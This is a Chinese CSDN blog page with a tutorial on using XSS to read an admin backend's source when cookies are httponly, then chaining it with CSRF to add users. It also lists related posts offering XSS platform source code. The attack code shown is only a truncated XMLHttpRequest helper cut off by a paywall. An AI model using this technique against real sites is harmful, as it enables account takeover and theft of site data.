xss实现获取网站源码

最新推荐文章于 2023-05-17 16:49:52 发布
最新推荐文章于 2023-05-17 16:49:52 发布
阅读量710 收藏
点赞数
原文链接:http://www.cnblogs.com/afanti/p/8277344.html
版权
本文探讨了在网站cookie设置为httponly时,如何通过XSS获取网站后台URL,并利用AJAX构造POST数据包进行潜在的XSS+CSRF攻击。通过在XSS平台上设置代码,当管理员访问时,会将后台源码发送到攻击者的服务器,以此发现并尝试执行敏感操作,如添加用户、修改密码等。
摘要由CSDN通过智能技术生成

当网站cookie设置了httponly,xss获取不到到网站的cookie。但是我们是可以获取到网站后台的url。

这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等。

在这个xss点上,用ajax构造post数据包,添加用户。这就应该是xss+csrf的利用。

最近开发我们学校的党建系统,下面我们来复现一下上面操作:

1、前提是我们已经获得后台的地址了,这时候在xss平台上配置如下代码:

 1     function createXmlHttp() {
 2     if (window.XMLHttpRequest) {
 3         xmlHttp = new XMLHttpRequest()
 4     } else {
 5         var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
 6         for (var n = 0; n < MSXML.length; n++) {
 7             try {
 8                 xmlHttp = new ActiveXObject(MSXML[n]);
 9                 break
10             } catch(e) {}
11         }
12     }
13 }
14 createXmlHttp();
15 xmlHttp.onreadystatechange = function(){
16
最低0.47元/天 解锁文章
weixin_30600503
关注
XSS检测工具XSStrike源码分析及使用记录
墨痕诉清风的博客
08-25 955
如果您的操作系统不支持此功能,或者您不想这样做,则可以简单地从命令行添加标头,\n并按如下所示分隔: python xsstrike.py -u http://example.com/page.php?q=query --headers "Accept-Language: en-US\nCookie: null",要使延迟最小,请使用-d选项将延迟设置为1秒。想要将有效负载注入URL路径,例如http://example.com/search/,您可以使用--pathswitch来实现
最新完善版XSS平台源码.zip
11-08
在CSDN上找了好多都是收费好贵的XSS平台源码,为了不让大家损失过多的币,忍痛把自己的源码分享低价给大家用。比某些黑心的分享者50币..要好点吧,代码是一样的,都是最新的。里面只有个默认模块,那些Xss注入语句模块是需要大家自己去找的。放心绝对纯净无后门
xss读取php源码,xss配合php获取cookie和session的脚本
weixin_39605347的博客
03-09 288
1.[代码][PHP]代码
渗透测试 | 一次利用XSS读取源码
MachineGunJoe666
05-17 820
常规的XSS利用方式主要有窃取cookie、恶意链接、获取键盘记录、网页钓鱼、挂马等等,本次渗透首先通过XSS漏洞,利用XMLRequest发起ajax请求,实现了发起http请求的目的,并且把请求的结果返回了,通过代码审计,打开了突破的口子。后续还运用到了Nosql注入、绕过2FA验证、kdbx文件解密等等技术,渗透过程涉及很多小的知识点,充满乐趣与挑战,下面开始此次渗透之旅。
xss读取php源码,如何使用XSSaminer工具在PHP源码中挖掘XSS漏洞
weixin_39967096的博客
03-09 162
我近期发现了一种通过寻找共性pattern在PHPsource码中发掘跨站脚本工具介绍它首先会检查脚本参数:代码分析:如果第一行的参数$1为空,就显示使用$0作为脚本名的用例并终止程序;否则,就将该参数分配给主函数中使用的f变量。sources=(GET POST REQUEST "SERVER/['PHP""SERVER/['PATH_" "SERVER/['REQUEST_U")sinks=(...
xss读取php源码,xss文件页面内容读取(解决)
weixin_39897687的博客
03-09 452
js:document.body.addBehavior("#default#Download");var mycars = new Array();mycars[0] = "l.htm";mycars[1] = "y.htm";for (x in mycars ){if(document.body.startDownload(mycars[x],GetData)){GetData(source)...
最新完善版XSS平台源码 【40多个模块】,xss源码下载,PHP
03-26
例如,可能会有模块演示如何构造跨站脚本,如何利用XSS获取用户的Cookie,以及如何利用XSS进行钓鱼攻击等。同时,可能还有关于XSS过滤、转义、HTTPOnly Cookie设置等防御机制的实现和演示。 对于想要学习XSS安全的...
2020年最新版本_XSS平台源码_超强版.rar
05-08
XSS场景中,可能会用到这个库来规避同源策略,实现跨域数据获取。 6. `multipart.php`:这可能是一个处理多部分表单数据的PHP脚本,通常用于上传文件。XSS攻击者可能会利用不安全的文件上传功能注入恶意脚本。 7...
XSSFilter源码
06-03
### XSSFilter源码详解 #### 一、XSSFilter概览 XSSFilter是一种用于防止跨站脚本攻击(Cross-Site Scripting,简称XSS)的安全组件。它通过过滤HTTP请求中的潜在恶意数据来阻止XSS攻击的发生。在本文档中,我们将...
xss源码(常用站源码附安装教程).rar
03-10
一份比较齐全的XSS平台源码,里面有部署文档,需要的自取。
XSSme平台源码
04-11
SS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
XSS检测Java源码
Little Boy
08-31 2169
1、跨站脚本的概念 这里就不多说了,可以百度。或者去看: 邱永华. XSS 跨站脚本攻击剖析与防御[J]. 中国科技信息, 2013, 20: 079. 吴翰清. 白帽子讲 Web 安全[J].信息安全与通信保密, 2015 (5): 93. 2.防御框架 自己查阅了文献参考了网上一些代码,自己实现了一套防御框架。 防御框架结构图如下如所示:
一次利用XSS读取源码和Nosql注入渗透测试
Python_0011的博客
05-06 508
常规的XSS利用方式主要有窃取cookie、恶意链接、获取键盘记录、网页钓鱼、挂马等等,本次渗透首先通过XSS漏洞,利用XMLRequest发起ajax请求,实现了发起http请求的目的,并且把请求的结果返回了,通过代码审计,打开了突破的口子。后续还运用到了Nosql注入、绕过2FA验证、kdbx文件解密等等技术,渗透过程涉及很多小的知识点,充满乐趣与挑战,下面开始此次渗透之旅。
xss基础之xss网站找寻
jiangliuzheng的专栏
07-14 2923
1、通过google搜索xss网站 关键字:inurl: asp?bigclassname 原理:要懂得bigclassname参数是网站显示的目录等参数,一般会在网页中显示出相应的参数内容,当后台get数据时未对参数进行特殊字符进行过滤时,就有可能通过对参数进行特殊赋值,插入脚本语句就能产生出执行脚本的功能。同样的参数可以还有name、product等,不过要根据实际情况 3、有时
【CTF题】使用文件包含漏洞读取网页代码
热门推荐
keysking瞎写东西的地方
01-25 2万+
【CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
易购商城电子商务网站源码
最新发布
06-12
易购商城的电子商务网站源码通常是一个复杂的软件系统,它由前端和后端两大部分组成。前端部分主要负责用户的界面交互和体验,包括HTML、CSS、JavaScript以及可能的前端框架如React、Vue或Angular;后端则是服务器端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值